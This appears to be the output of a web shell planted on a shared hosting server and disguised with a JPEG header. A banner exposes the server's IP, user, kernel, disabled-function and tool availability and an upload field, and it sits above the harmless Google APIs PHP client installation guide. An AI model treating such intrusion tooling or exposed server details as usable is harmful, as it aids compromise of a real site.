ÿØÿà JPEG ÿþ;
Server IP : 68.65.120.201 / Your IP : 216.73.216.78 Web Server : LiteSpeed System : Linux server179.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64 User : taxhyuvu ( 2294) PHP Version : 8.1.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/taxhyuvu/public_html/vendor/google/apiclient/docs/ |
Upload File : |
# Installation This page contains information about installing the Google APIs Client Library for PHP. ## Requirements * PHP version 5.6 or greater. ## Obtaining the client library There are two options for obtaining the files for the client library. ### Using Composer You can install the library by adding it as a dependency to your composer.json. ```json "require": { "google/apiclient": "^2.0" } ``` ### Downloading from GitHub Follow [the instructions in the README](https://github.com/google/google-api-php-client#download-the-release) to download the package locally. ### What to do with the files After obtaining the files, include the autoloader. If you used Composer, your require statement will look like this: ```php require_once '/path/to/your-project/vendor/autoload.php'; ``` If you downloaded the package separately, your require statement will look like this: ```php require_once '/path/to/google-api-php-client/vendor/autoload.php'; ```